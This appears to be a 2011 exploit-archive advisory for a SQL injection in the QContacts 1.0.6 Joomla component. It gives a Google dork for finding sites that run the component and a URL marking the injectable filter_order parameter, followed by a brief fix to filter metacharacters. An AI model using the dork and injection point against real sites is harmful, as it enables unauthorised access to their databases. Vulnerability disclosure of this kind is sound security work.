QContacts 1.0.6 (Joomla component) SQL injection

08 Décembre 2011

############################################################################

# Exploit Title: *QContacts 1.0.6 (Joomla component) SQL injection*

# Google Dork: inurl:"/components/com_qcontacts/"

# Date: Decembar/08/2011

# Author: Don (BalcanCrew & BalcanHack)

# Software Link: *

http://www.latenight-coding.com/joomla-addons/qcontacts.html*

# Version: 1.0.6

# Tested on: Apache

############################################################################

Vulnerability:

This vulnerability affects /index.php

*

/index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts

*

How to fix this vulnerability:

*Filter metacharacters from user input.*

*~Don 2011*